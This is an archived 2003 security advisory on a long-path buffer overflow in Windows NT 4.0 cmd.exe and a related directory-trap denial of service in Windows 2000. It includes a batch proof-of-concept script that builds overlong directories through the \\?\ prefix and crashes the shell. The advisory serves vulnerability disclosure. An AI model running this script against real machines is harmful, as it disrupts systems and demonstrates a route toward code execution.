11th Feb 2003 [SBWID-5980]
COMMAND
	Windows cmd.exe long path buffer overflow/DoS
SYSTEMS AFFECTED
	 Microsoft Windows NT 4.0 (buffer overflow)
	 Microsoft Windows 2000 (DoS)
PROBLEM
	In 3APA3A [[email protected]] advisory :
	
	http://www.security.nnov.ru
	         /\_/\
	        { , . }     |\
	+--oQQo->{ ^ }<-----+ \
	|  ZARAZA  U  3APA3A   }
	+-------------o66o--+ /
	                    |/
	
	--snip--
	NTFS file system allows to create paths of almost unlimited length.  But
	Windows API does not allow  path  longer  than  256  bytes.  To  prevent
	Windows API from  checking  requested  path  \\?\  prefix  may  be  used
	for filename. This is documented feature of Windows API.
	cmd.exe from Windows NT 4.0 has trivial buffer overflow  in  CD  command
	if destination path is longer than 256 characters. This vulnerability  may
	be trivially exploited to execute code.
	cmd.exe from Windows 2000 has no buffer overflow, but than  changing  to
	directory with a path slightly longer than 256 characters  (for  example
	260 characters) cmd.exe becomes "jailed" in this directory, it means  cd
	.. command will  fail.  It  may  cause  DoS  against  maintenance  batch
	script.
	 Exploitation
	 ============
	
	@echo off
	SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
	mkdir \\?\c:\%A%
	mkdir \\?\c:\%A%\%A%
	mkdir \\?\c:\%A%\%B%\
	c:
	cd \
	cd AAAAAAAAAAAA*
	cd AAAAAAAAAAAA*
	cd BBBBBBBBBBBB*
	cd ..
	
	creates directory with 2 subdirectory.  First  one  demonstrates  buffer
	overflow on Windows NT 4.0 (second  cd  AAAAAAAAA*  command  will  crash
	cmd.exe with EIP overwritten) second one demonstrates cmd.exe to  change
	directory to AA...\BB..., but cd .. command will fail.
	--snap--
SOLUTION
	None yet